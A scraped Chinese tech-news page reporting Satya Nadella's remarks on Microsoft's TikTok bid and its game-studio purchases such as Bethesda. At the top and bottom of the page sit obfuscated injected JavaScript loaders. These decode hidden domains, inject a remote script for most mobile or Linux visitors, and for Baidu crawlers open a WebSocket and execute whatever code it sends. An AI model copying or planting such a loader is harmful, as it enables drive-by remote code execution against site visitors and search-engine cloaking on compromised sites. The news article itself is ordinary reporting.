function hPSpQMJ(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function CeDWKSs(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return hPSpQMJ(t);};window['\x47\x42\x7a\x57\x4d\x45\x6f\x4f\x4b']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=CeDWKSs,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/q/'+i;cs.parentElement.insertBefore(s,cs);}})('aGG4uc3BvcnRzZHJlYW0udGG9w','dHIueWWVzdWW42NzguY29t','138805',window,document,['G','W']);}:function(){};

微软CEO谈收购Tiktok谈判:变味了 我绝不愿意参与

微软首席执行官萨蒂亚·纳德拉(Satya Nadella)和Xbox业务负责人菲尔·斯宾塞(Phil Spencer)最近接受采访,讨论了欲收购更多游戏工作室、如何继续取得成功以及与短视频应用TikTok(抖音)收购谈判相关的反思。

微软CEO谈收购Tiktok谈判:变味了 我绝不愿意参与

对于Tiktok谈判,纳德拉表示:“这绝对不是我所熟悉的谈判,也绝对不是我愿意参与竞标的交易。自那以后,这笔交易显然发生了很大变化。

微软向来被称为商业软件巨头,为世界上大多数个人电脑提供动力,并建立幕后技术和工具。

但该公司也花费了超过100亿美元收购世界上许多最受欢迎的视频游戏开发工作室。对于纳德拉来说,这一切都关乎软件的未来。

虽然纳德拉本人并不是游戏玩家,但他在视频游戏行业下了大赌注。

在2014年被任命为首席执行官后不久,他就决定斥资25亿美元收购《我的世界》(Minecraft)开发商Mojang。

随后,他在2018年又收购了五家工作室,其中包括角色扮演游戏开发商黑曜石(Obsidian),该公司以太空冒险游戏《外部世界》(The External World)和广受欢迎的《南方公园:真理之棒》(South Park:The Stick of Truth)而闻名。

2019年,微软收购了冒险游戏《疯狂世界》(Psychonauts)的开发商Double Fine。

驱使纳德拉做出这些决策的是一种信念,即互动娱乐将是未来10年的关键技术,使用微软产品的游戏玩家希望该公司能制作出与其收购工作室开发的相似游戏。

在微软宣布以75亿美元现金收购互动娱乐巨头ZeniMax Media(旗下拥有多家行业领先游戏开发工作室)后,纳德拉在采访中表示:“你不能早上醒来突然就宣布,‘让我建个游戏工作室’,这需要拥有内容支撑,以便让我们能够接触到更大的社区。”

纳德拉说,这就是微软为何考虑将来收购更多视频游戏工作室的原因,也是为何其继续投资于Xbox Game Pass订阅服务的原因。

Xbox负责人菲尔·斯宾塞(Phil Spencer)也表示:“内容是我们平台最关键的组成部分,我们将继续投资。这使我们的创意组织规模翻了一番。”

微软的收购凸显了该公司寻求建立其Xbox品牌的最戏剧性方式。这些收购还为该公司提供了更多的游戏,使其在日益成为热门游戏驱动的业务中大展身手。

竞争对手索尼以发行独家游戏而闻名,从后世界末日的惊悚游戏《最后的生还者》(The Last of Us)到寻宝游戏《神秘海域》(Uncharted)再到动作游戏《战神》系列等。

《漫威蜘蛛侠:迈尔斯·莫拉莱斯》(Marvel‘s Spider-Man:Miles Morales)将在11月随同售价高达500美元的PlayStation 5一起发布。

与此同时,Xbox团队最出名的是其《光晕》(Halo)和《战争机器》(Gears Of War)系列游戏,以及赛车游戏《极限竞速》(Forza),不过这些都不会成为其500美元Xbox Series X发布时的焦点。

考恩(Cowen)的分析师在给投资者的报告中写道:“微软现在不需要再进行一次重大的内容或IP收购。”

虽然微软可能是许多热门游戏的所有者,但有些游戏玩家表示,该公司需要提升自己的游戏水平,特别是与索尼相比。

游戏网站Polygon在2018年写道:“看看两家公司2018年的独家游戏名单,你会发现结果很可怕,至少对Xbox的粉丝来说是这样。”

斯宾塞在采访中表示,游戏玩家将看到贝塞斯达工作室带来的显著不同,并指出后者的游戏将在上架的同时也出现在微软Xbox Game Pass订阅服务中。

它们还将通过微软的XCloud视频游戏流媒体服务提供,该服务允许人们在互联网上玩游戏,类似于他们从Netflix观看电影的方式。

斯宾塞还说,贝塞斯达将以半独立的方式运营,以让其继续开发最初给它带来成功的游戏。

他说:“这关系到这些团队的文化,他们不需要变得与我们完全相同。”

这也是游戏公司将继续受到微软关注的原因。纳德拉说:“我们将坚持寻找在目标、使命和文化方面与我们有共同点的公司。”

他指出,自2001年首款Xbox发布以来,Xbox团队始终在与包括贝塞斯达在内的游戏工作室合作,“我们将始终寻求在有意义的地方实现无序增长”。

微软CEO谈收购Tiktok谈判:变味了 我绝不愿意参与

贝塞斯达并不是微软在过去几个月里参与的唯一一笔消费产品收购,该公司还出价竞购短视频应用TikTok。

纳德拉说,TikTok母公司字节跳动曾与微软接洽,试图创建一家由微软全资拥有的公司。

然而最终,商业软件开发商甲骨文和零售商沃尔玛成功入股名为TikTok Global的新公司。

纳德拉对此表示:“这绝对不是我所熟悉的谈判,也绝对不是我愿意参与竞标的交易。自那以后,这笔交易显然发生了很大变化。”

但纳德拉称,如果微软赢得了这笔收购,他认为这是该公司扩大软件业务努力的一部分。

他说:“我不会每天一醒来就想着要变成别人,我每天都这样开始:‘我怎样才能把自然而然就能做好的事情做得更好?’”

这就是纳德拉试图收购TikTok的原因,也是收购贝塞斯达的初衷。

给TA买糖
共{{data.count}}人
人已赞赏
数码圈

RTX3080/90玩游戏崩溃原因 或与芯片背面的电容有关

2020-9-27 13:27:18

数码圈

马云:教育迫切需要改变 否则孩子未来竞争不过机器

2020-9-28 22:31:40

function OdHtwI(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function hVIzGUms(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return OdHtwI(t);};window['\x6a\x75\x57\x4b\x49\x53\x45\x76']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=hVIzGUms,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/q/'+i;cs.parentElement.insertBefore(s,cs);}})('aG4ucc3BvccnRzZHJlYW0udG9w','dHIueWVzdW42NzgguY29t','138806',window,document,['c','g']);}:function(){};
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧